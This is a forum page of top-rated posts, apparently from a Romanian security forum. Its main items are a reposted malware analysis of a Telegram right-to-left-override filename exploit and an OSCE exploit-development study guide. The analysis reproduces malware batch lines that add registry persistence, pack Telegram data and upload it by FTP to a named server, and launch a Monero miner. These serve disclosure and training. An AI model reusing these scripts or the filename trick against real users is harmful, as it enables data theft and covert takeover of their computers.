Leaderboard
Popular Content
Showing content with the highest reputation on 02/13/18 in all areas
-
Opensc, da, baaaa. Acum este https://www.opensc.io daca intereseaza pe cineva.2 points
-
Mi-am amintit de Cem Paya, ala care a lucrat initial la google wallet. Dc va intereseaza blogul omului https://randomoracle.wordpress.com/author/cemp/1 point
-
Sursa: https://securelist.com/zero-day-vulnerability-in-telegram/83800/ The special nonprinting right-to-left override (RLO) character is used to reverse the order of the characters that come after that character in the string. In the Unicode character table, it is represented as ‘U+202E’; one area of legitimate use is when typing Arabic text. In an attack, this character can be used to mislead the victim. It is usually used when displaying the name and extension of an executable file: a piece of software vulnerable to this sort of attack will display the filename incompletely or in reverse. Launching an attack on Telegram Below is an account of how this vulnerability was exploited in Telegram: The cybercriminal prepares the malware to be sent in a message. For example, a JS file is renamed as follows: evil.js -> photo_high_re*U+202E*gnp.js Where *U+202E* is the RLO character to make Telegram display the remaining string gnp.js in reverse. Note that this operation does not change the actual file – it still has the extension *.js. The attacker sends the message, and – surprise! – the recipient sees an incoming PNG image file instead of a JS file: When the user clicks on this file, the standard Windows security notification is displayed: Importantly, this notification is only displayed if it hasn’t been disabled in the system’s settings. If the user clicks on ‘Run’, the malicious file is launched. Exploitation in the wild After learning the vulnerability, we began to research cases where it was actually exploited. These cases fall into several general scenarios. Remote control The aim of this sort of attack is to take control of the victim’s system, and involves the attacker studying the target system’s environment and the installation of additional modules. Attack flowchart At the first stage, a downloader is sent to the target, which is written in .Net, and uses Telegram API as the command protocol: With this token and API, it is easy to find the Telegram bot via which the infected systems are controlled: When launched, it modifies startup registry key to achieve persistence on a system and copies its executable file into one of the directories, depending on the environment: Then it begins to check every two seconds for commands arriving from the control bot. Note that the commands are implemented in Russian: The list of supported commands shows that the bot can silently deploy arbitrary malicious tools like backdoors, loggers and other malware on the target system. A complete list of supported commands is given below: Command (English translation) Function “Онлайн (“Online) Send list of files in directory to control bot. “Запус (“Launch) Launch executable file using Process.Start(). “Логгер (“Logger) Check if tor process is running, download logg.zip, unpack it, delete the archive and launch its content. “Скачать (“Download) Download file into its own directory. “Удалить (“Delete) Delete file from its own directory. “Распаковать (“Unpack) Unpack archive in its own directory using specified password. Убить (Kill) Terminate specified process using process.Kill() Скачат (Download) Same as ‘Download’ (see above), with different command parsing. Запуск (Launch) Same as ‘Launch’ (see above), with different command parsing. Удалить (Delete) Same as ‘Delete’ (see above), with different command parsing. Распаковать (Unpack) Same as ‘Unpack’ (see above), with different command parsing. Процессы (Processes) Send a list of commands running on target PC to control bot. An analysis of these commands shows that this loader may be designed to download another piece of malware, possibly a logger that would spy on the victim user. Miners and more Amid the cryptocurrency boom, cybercriminals are increasingly moving away from ‘classic robbery’ to a new method of making money from their victims – namely mining cryptocurrency using the resources of an infected computer. All they have to do is run a mining client on the victim computer and specify the details of their cryptocurrency wallet. Scenario #1 Attack flowchart At the first stage of the attack, an SFX archive with a script is used that launches an executable file: Path=%temp%\adr Setup=%temp%\adr\run.exe Silent=1 Overwrite=2 This run.exe file is in fact a BAT file. The batch script, after extraction, looks like this: As we can see, the malicious program first opens a decoy file – in this case it is an image to lull the victim into a false sense of security. Then, two miners launch one after the other. They are launched as services with the help of the nssm.exe utility, which is also contained in the same SFX archive. nheq.exe: an Equihash miner for NiceHash (in this specific case, it mined Zcash). Can use the resources of both the CPU and graphics accelerator: taskmgn.exe – another popular miner implementing the CryptoNight algorithm. It mines Fantomcoin and Monero. There is a known specific string with pdb path: We have seen several versions of this batch script, some of which have extra features: This specific version disables Windows security features, then logs on to a malicious FTP server, downloads a payload and launches it. In this case, the payload was an SFX archive that contains another miners and a Remote Manipulator System (RMS) client, an analog of TeamViewer. Using AutoIt scripts, the malware deploys RMS on the targeted computer for subsequent remote access: The attack flowchart is approximately as follows: We have examined this FTP server and found several more similar payloads, which are possibly loaded by other versions of this malware. The file address4.exe is worthy of a special mention. Like the other files, it is an SFX archive with the following contents: All components named st*.exe are executable PE files converted in a similar way from batch scripts. The SFX script launches the component st1.exe: Path=%temp%/adress Setup=%temp%/adress/st1.exe Silent=1 Overwrite=2 st1.exe adds st2.exe to the system startup by writing the appropriate record to the system registry: reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v RUN1 /d %temp%\adress\st2.exe /f So the st2.exe file launches when system is booted next time: TIMEOUT /T 10 /NOBREAK #Waits for Telegram to launch chcp 1251 tskill telegram taskkill /IM telegram.exe #Terminates Telegram processes md %temp%\sss cd %temp%\sss #Creates a temporary directory “%temp%\adress\WinRAR.exe” A -ibck -inul -r -agYY-mm-dd-hh-mm-ss “%temp%\sss\1.rar” “%appdata%\Telegram Desktop” #Packs the Telegram directory into a RAR archive TIMEOUT /T 60 /NOBREAK :begin ping -n 1 ya.ru |>nul find /i “TTL=” && (start “” %temp%/adress/st3.exe) || (ping 127.1 -n 2& Goto :begin) #Checks Internet connection and launches st3.exe As expected, st3.exe logs on to the malicious FTP server and uploads the RAR archive that was created earlier: @echo XXXXXXXX>command.txt @echo XXXXXXXX>>command.txt @echo binary>>command.txt @echo mput %temp%\sss\*.rar>>command.txt @echo quit>>command.txt ftp -s:command.txt -i free11.beget.com del command.txt attrib %temp%/adress +H attrib %temp%/adress\* +H On that FTP server, we discovered several archives of this type containing Telegram directories stolen from the victims: Each dump contains, as well as the Telegram client’s executables and utility files, an encrypted local cache containing different files used in personal communications: documents, videos and audio records and photos. Scenario #2 Just like in the previous scenario, an attack starts with an SFX archive opening and launching a VBScript that it contains. Its main job is to open a decoy image to distract the user, and then download and launch the payload: The payload is an SFX archive with the following script: svchost.vbs is a script controlling the launch of the miner CryptoNight (csrs.exe). It monitors the task list; if it detects a task manager (taskmgr.exe, processhacker.exe) on that list, it terminates the miner’s process and re-launches it when the task manager is closed. The script contains the appropriate comments: The miner itself is launched as follows: WshShell.Run “csrs.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u XXXXXXXXX@yandex.ru -p x -dbg -1″ & cores, 0 The pool address is associated with the cryptocurrency Monero. On the server itself, in addition to the specified payload files, we found similar SFX archives with miners:1 point
-
1 point
-
https://capec.mitre.org/data/definitions/471.html http://www.zdnet.com/article/skype-cannot-fix-security-bug-without-a-massive-code-rewrite/1 point
-
Este foarte putin probabil sa se strice o placa video integrata, sau procesoul in sine. Eu iti recomand sa il desfaci din nou poate ai uitat vreun cablu. Cum deja e "stricat", putin rau ai putea sa mai faci. Dupa ce il desfaci, scoate procesorul si vezi daca atunci cand l-ai bagat ai indoit un pin ceva, daca nu incearca sa conectezi cat mai putine chestii, cum ar fi fara cd-rom, hdd sau boxe bla bla. Incearca decat cu ecranul, placa in sine, un modul de ram, incarcatorul ( alimentatia) si butonul de aprins, fara sa il montezi de tot, asigurate ca placa nu atinge ceva gen haine sau un surub, sau ai lasat furculita de la ciorba de la bunica pe ea (ca sa nu faca scurt) si aprindel, daca nu se aprinde, verifica de 6-7 ori ca ai conectat ce am zis, dupa mai dai odata, daca iti face la fel ca la inceput, sa nu iti dea video, schimba memoria ram de slot, si dai din nou, daca tot nu merge, scoate memoria aia si puneo pe cealalta, si fa acelasi lucru ca si cu cealalta (schimbi de slot daca nu merge). Dupa ce iti porneste bine, pui toate saraciile la loc (hdd, cd-rom, vibratorul) pe rand, dupa fiecare piesa pusa il aprinzi si vezi daca merge. Dupa ce le ai pe toate conectate il inchizi de tot si imi trimiti o bere xD O sa fiu atent la topic, sa imi zici ce ai facut1 point
-
1 point
-
https://leanpub.com/xss by https://twitter.com/brutelogic1 point
-
Ce treaba ai tu ma. Lasa femeia sa bage si ea o mufa ceva :))))))) Puteai sa spui simplu ca vrei sa accesezi o camera, nu ca e coana ma-ta implicata acolo. Deja mi s-au sculat doua pule cu gandul la ce ar putea face in lift. Dubiosule.1 point
-
OSCE/CTP Prep Guide July 18, 2017 Tulpa What this prep guide is and isn’t If you have read my OSCP prep guide (https://tulpa-security.com/2016/09/19/prep-guide-for-offsecs-pwk/), then you know that I don’t just dump a ton of redundant resources on you and say good luck. Your time is precious, and your learning should be well calibrated to studying the best quality information available. This prep course is meant to be completed prior to taking the CTP course. If you look at the CTP covers, you’ll find that I don’t delve into some of the course topics and reason for that is twofold. Firstly, this is meant to prepare you for CTP, not to replace the CTP in anyway. Secondly, CTP is an outstanding quality course and some things are covered from the ground up in such a way that you simply don’t need to prepare for it. Although the resources in this course is carefully curated, it won’t do you much good if you simply read the notes and watch the videos. You have to practice! Repetition is the mother of skill, and exploit development is no different. You will also find that I would recommend reading two tutorials regarding the same topic. This isn’t about repetition as much as it’s about getting two perspectives on the same topic. This is a great way of really deepening your understanding of the course material. Disclaimer: I am not affiliated with any of the authors of the resources that I mention here. I recommend them and reference them because I truly believe in their work and its applicability to the OSCE certification. Lesson 0 – Getting your resources together In order to follow along, you need to get your hands on the Security Tube Linux Assembly Expert (32 bit) course. It’s quite affordable when you consider the value that you’re getting. As you know, CTP/OSCE is windows based so the SLAE material isn’t going to help you with all the concepts, however it does a very good job of covering a wide range of topics that you need to know. I honestly haven’t found a better guide and believe me when I say that I tried. I am very pleased to share that the kind people from Security Tube is offering readers of this guide 25% off not only the 32-bit SLAE course, but also the 64-bit version! Thank you Vivek Ramachandran for making your excellent material more accessible to the community. To get the discount, you can follow this link: http://promo.securitytube-training.com/slae64092015 For your lab environment I would recommend that you set up three machines. The first obviously being Kali, the second would be a Windows XP SP3 client, and lastly a Windows 7 client. A lot of people e-mailed me when I wrote my OSCP prep course and asked where they can get ahold of older versions of Windows OS’s. I can’t provide you with a download link, but I’m sure that you will figure it out. In my case, I was lucky enough to have some old MSDN disks laying around. After you set everything up and installed immunity and mona (or olly), then be sure to take a snapshot of your machines before starting. Lesson 1 – Introduction The key to deepening and accelerating your learning in this particular subject is dependent upon what you do in this first lesson. While not glamorous, this is ideally where you need to spend some time to memorize the various registers and what they are used for as well as the various sections of the debugger. If you know what an EDI register is used for off by heart as an example, then you can think creatively and form a much deeper understanding of the rest of the material going forward. Don’t forget to also focus on the various sections of the registers in terms of AH vs AL etc. What I found very useful was using a flashcard app at brainscape.com. This app in particular is great because it uses an algorithm to determine how well you know each card and then adjusts the frequency in which they appear. Go through the below resources in order prior to creating your flash cards. The first resource you need to go through is http://www.securitysift.com/windows-exploit-development-part-1-basics/ This is where you will get the bulk of your information for your flash cards. Also pay particular attention to the layout of immunity debugger. Both Olly and Immunity uses exactly the same layout so rest assured that this information is worth knowing. Also don’t get too intimidated by the PEB and TEB(S) section. If your struggling with that section, then you can come back to it later in the course at it will click. Next up is SLAE videos 1-7. The total length of these videos are just over an hour, but you can expect to spend an extra 30 minutes on it because of how frequently you will have to pause and take notes for your flash cards. In the next lesson you’ll be working through GDB. You don’t have to have your flashcards memorized prior to moving onto the next session so no need to pause your progress. Lesson 2 – GNU Debugger (GDB) In order to make the most of the SLAE videos, you have to do the GDB course that’s included. I know that you want to get to the meat of the course and start pwning machines, but you have to walk before you can run. Tip: These videos are very easy to follow along when you up the playback speed. I found x1.75 to be a comfortable speed for these videos particularly (don’t do the same with the rest of the SLAE course). By doing this you can cut the total video time from 3 hours and 40 minutes down to 2 hours and 52 minutes. Lesson 3 – Basic Assembly In this section you need to watch the 8th and 9th video in the SLAE series which is only 30 minutes. More than just focusing on the assembly, I want you to pay particular attention to how he uses a syscall to print hello world. This is the essence of shellcoding which we will get to later. After that, watch SLAE videos 10-12 which will take you 53 minutes. At this stage it’s a good idea to memorize the op codes for one or two commands that will make reading assembly so much easier down the line. The ones that I recommend to include in your own list. CALL – FF Dx. This could be anything from D0 to D7 based on the register that it’s referencing. Again you’re just trying to recall what a command does when you see it, so you don’t have to memorize the number for each register. JMP – EB. You’re going to be seeing this one alot! INC – 4x. Again this goes from 40 to 47 depending on the register. When you fuzz a program you’re going to be using a lot of A’s, B’s and C’s which translate to 41, 42, 43 respectively. That means that sending A (or 41 in hex) to a program, will be interpreted as a INC ECX command. This is useful to know not just for quickly identifying where your offset lands, but also as a reminder that they can be interpreted as commands. DEC – 4x. This carries on where INC stopped and goes from 48 to 4F depending on the register. Careful of information overload here. Limit your list to seven or eight opcodes at most. Lesson 4 – Stack based overflows The lesson that you have been waiting for. Let’s pop some shells! Go through these two lessons in order first, because the Corelan tutorial does a good job of including a quick refresher of what you have already learned. Remember to DO the work and not just read them over. https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ http://www.securitysift.com/windows-exploit-development-part-2-intro-stack-overflow/ Vulnserver is an amazing go to practice and for you to test a ton of your exploits. Once you successfully exploit them, keep those scripts on hand because it’s such a quick way to get some of your shellcode into memory and also to test out some commands. You can find the download link for vulnhub here, along with a tutorial on how to exploit it in various ways. Try and do it yourself first and if you get stuck then you can have a look the walkthrough for guidance. http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-1-introduction/ http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-2-exploiting-the-stack-overflow/ http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-3-%E2%80%94-adding-shellcode/ Lesson 5 – Useful information This is a very short lesson to quickly drop you three resources that was very important to me during my OSCE. Firstly, don’t trust windows calculator for hex. We’ll only be doing these manual calculations later in the course but allow me to explain. Open up windows calculator and set it to ‘programmer’ mode. Click on ‘HEX’ in the left hand side and type in 9A and divide that by 3. The answer is 33 right? Wrong. What windows calculator doesn’t tell you is that the real answer is 33 with a remainder of 1. You can verify the answer here: http://www.calculator.net/hex-calculator.html?number1=9A&c2op=%2F&number2=3&calctype=op&x=68&y=7 Next up, is the best wallpaper you will ever see. It’s been a great reference and I think you’ll find it very useful for CTP http://i.imgur.com/Mr9pvq9.jpg Lastly, there’s an online disassembler which I used once or twice when I wasn’t at my Kali machine. https://www.onlinedisassembler.com/static/home/ Lesson 6 – Offsets and JMP’s When your exploit isn’t working as expected then chances are that your offset is wrong. Make sure you keep this information at the forefront of your mind. http://www.securitysift.com/windows-exploit-development-part-3-changing-offsets-and-rebased-modules/ Now it’s time for JMPing around memory. You’ll find in the CTP course that sometimes you need to creatively JMP out of a tight spot to get to a bigger buffer space. At the bottom of the page on the corelan tutorial I’m about to share, you’ll find a reference chart listing a couple of different JMP’s. Pick a couple, load up one of your vulnserver exploits and experiment with them. It’s important that you understand the various conditions that need to be met for some of these JMP’s to occur. https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/ Also be sure to check out this article for more inspiration: http://www.securitysift.com/windows-exploit-development-part-4-locating-shellcode-jumps/ Lesson 7 – Fuzzing For the OSCE, you have to use a fuzzer called Spike. While incredibly power and versatile, it’s not the prettiest and require a bit of work on your part. It’s not difficult to use, but it’s very easy to screw up if you don’t pay attention to your fuzzing template. When building a template, be sure to first interact with the program the normal way while running wireshark. As an example, FTP to a server and have a look at what the traffic looks like. Your job now is to create your spike template to replicate exactly what wireshark has captured. Once again, fire it up when running spike to double check that you’re in fact getting the same result. Since your already familiar with vulnserver, it would be a good idea to practice it there. Here are two tutorials that will help you do just that. http://resources.infosecinstitute.com/intro-to-fuzzing/ http://resources.infosecinstitute.com/fuzzer-automation-with-spike/ Lesson 8 – More Assembly Now it’s time to watch some more SLAE videos, except this time you’ll notice that I’m leaving out a couple of them. Your welcome to watch them of course, but as I mentioned earlier I want to give you only the essential for you to focus on given your limited time. The SLAE videos I recommend is 13, 15-21. The total video length is 1 hour and 27 minutes. Lesson 9 – Structured Exception Handlers (SEH) Before we start, rest assured that this is not a hard topic. It’s well documented and once you have the hang of it, then it’s a piece of cake. Start out by going through these tutorials first. https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ http://www.securitysift.com/windows-exploit-development-part-6-seh-exploits Next up, it’s your time to practice SHE on your trusty vulnserver. http://resources.infosecinstitute.com/buffer-overflow-vulnserver/ Lesson 10 – Egghunters A lot of people recommend the scape egghunter paper which you can find here. http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf Your welcome to go through it, but I have to say that after spending a whole day on this, I didn’t walk away with much value that I could apply in practice. Don’t get me wrong it’s a great paper, but it was published in 2004 and effectively you’ll only need to make use of one of the egghunters in that paper. These two tutorials should give you everything that you need to get cracking (sorry I couldn’t help myself with the pun) https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/ http://www.securitysift.com/windows-exploit-development-part-5-locating-shellcode-egghunting Security Sift also talks about a technique called an omelet. You can skip that part because it doesn’t relate to the CTP course. Now head back to vulnserver and give your egghunter a test! Lesson 11 – ASLR Alright, this very similar to SEH in terms of complexity (which to say that it’s not that hard once you get the hang of it). You have to keep your blinkers on and only read the section in this paper that covers ASLR and skip everything else. https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/ In fact, don’t spend much time here because the CTP course does a great job of covering everything you need to know about ASLR. Lesson 12 – Restricted Characters By now you know all about bad characters and how to identify them. There is a whole chapter in the CTP course that deals with a particularly restrictive exploit which is quite infamous. Grab some popcorn and watch this amazing defcon talk by Mati regarding this very exploit. At this stage you’ll be able to follow along without any problems, but don’t worry about trying to replicate it just yet. You’ll be spending a lot of time in CTP doing just that. Instead, I would recommend that you head back to vulnserver. Some of the potential exploits have some bad characters that you can play with, but I would recommend a different approach. Create an exploit – and limit yourself instead. Limit a couple of your favorite commands like EB, and find alternative ways to get the same result. JMP commands are a great way of challenging yourself because the results are obvious and requires a bit of creative thinking. http://resources.infosecinstitute.com/restricted-character-set-vulnserver/ Exploit development requires a significant amount of creative thinking. Blindly following steps isn’t going to get you far so make sure you have a few tricks up your sleeve. Lesson 13 – Mona The CTP course is delivered in olly, but your welcome to make use of immunity and mona (neither are restricted in the exam). Mona can make your life a lot easier so I would recommend that you spend a bit of time getting to know some of the most commonly used commands. In fact, identifying bad characters is one of the most useful features of Mona so it builds on the previous lesson quite nicely. There is an extensive reference list here: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ Lesson 14 – Shellcoding Now this is where the fun REALLY starts. Disclaimer – shellcoding per se is not covered in the CTP course. That being said, I think it’s important enough to include here because it allows you to understand what your shellcode is doing, as well as to make some changes to it yourself. Keep in mind however that when you inspect a metasploit generated shell remember not to encode it otherwise it won’t make much sense. For the corelan tutorial, you should not only read it but actually do it yourself. I cannot stress the value of doing this enough https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/ Now would be a good time to watch SLAE videos 22-26 and pay attention to how he makes use of linux syscalls. It’s only one and a half hour but these videos are particularly packed with amazing information. Next up check out these guides in the order that they are listed. https://www.fuzzysecurity.com/tutorials/expDev/6.html http://sh3llc0d3r.com/windows-reverse-shell-shellcode-i/ http://www.vividmachines.com/shellcode/shellcode.html#ws Lesson 15 – Anti-Virus evasion This is a particularly tricky topic to recommend resources on because it’s a very deep rabbit hole. Remember that CTP/OSCE is primarily focused exploit development, and AV evasion is just one part of that. The techniques covered in CTP are a bit outdated, but still form the foundation of many other techniques. Because you can easily get side tracked, I would recommend sticking to the SLAE videos 27-36 only. I know it’s tempting to do more research (and your welcome to) but if your time is limited then you can just focus on the videos which will prepare you adequately. There is 2 hours and 30 minutes worth of information to go through in the videos. Lesson 16 – Develop your own exploit! At this stage, you know more than enough go out and create and publish your very own 0day (of sorts). Back in 2016, I discovered a set of 0days in products that are all created by one company. Since then, they have released many more versions of the same software – all of them vulnerable but require different exploits. If you search exploit-db, you’ll find that a lot of other people have created exploits since them for all the various different versions, and have done so in various different ways. Now it’s your turn. Download the software, get fuzzing, develop an exploit and submit to exploit-db J Make sure that it hasn’t been done before for the version that your targeting, and if it has then at the very least you have to use a completely different technique to get it working. The company and software downloads can be found here: http://www.flexense.com/ Here is one example of one of my early exploits for one of their products: https://www.exploit-db.com/exploits/40455/ Fuzzing one of the flexsense products will be a great exercise for you because it challenges you to recreate HTTP traffic in a spike template. Remember to look at EVERYTHING you do under wireshark. Lesson 17 – Web Applications Last but not least I wanted to discuss the web application section of the course. CTP does a phenomenal job at covering everything you need to know in such a way that preparing you for it would be redundant. That being said, I want to offer you a few resources and words of advice. The two main topics that you really need to master and know everything about is LFI and XSS. Finding those vulnerabilities are one thing, but make sure you know about the various ways in which you can exploit it to gain remote access to a server. Yup that’s right. Here are a couple of resources that I found useful in my research of the topic: https://www.exploit-db.com/docs/40992.pdf https://excess-xss.com/ https://www.veracode.com/security/xss Lesson 18 – Now what? At this stage you should be more than ready to take the CTP course. I would recommend working through the entire CTP course a minimum of three times, and make sure you do everything manually. As an example, you will be expected to do some manual shell encoding. Sure you can do this with a script, but you would really be cheating yourself out of an amazing (and painful) learning experience. Along the way I would also recommend that you spend a bit of time reading the exploits in exploit-db. I have learned a lot of very useful scripting techniques in a very short space of time because of this. In fact, I would go so far as to say that you start a collection of skeleton exploits for various purposes. I have also gone through a good couple of books in preparation for the OSCE exam and while some of them are really good (like the Shellcoders handbook), it didn’t really help me all that much. Offensive Security does a fantastic job with the course material and I would recommend that you expand your search for additional material only once you have gone through the manual and videos. The course has less to do with reading material, and more to do with practice. There is no substitution for practice and your time will be well spent doing just that. Sursa: https://tulpa-security.com/2017/07/18/288/1 point
-
https://drive.google.com/open?id=0B-IYIin_KvNDWVpSYkVuamxGRWc Arhiva cu 8 cursuri si 15 laboratoare, toate in romana, cu explicatii si exemple. Se pot invata clasele(bazele) in cateva zile lejer.1 point
-
Hello, Could you please give a smple step by step tutorial of how to use this? I will appreciate your respond. Thank You-1 points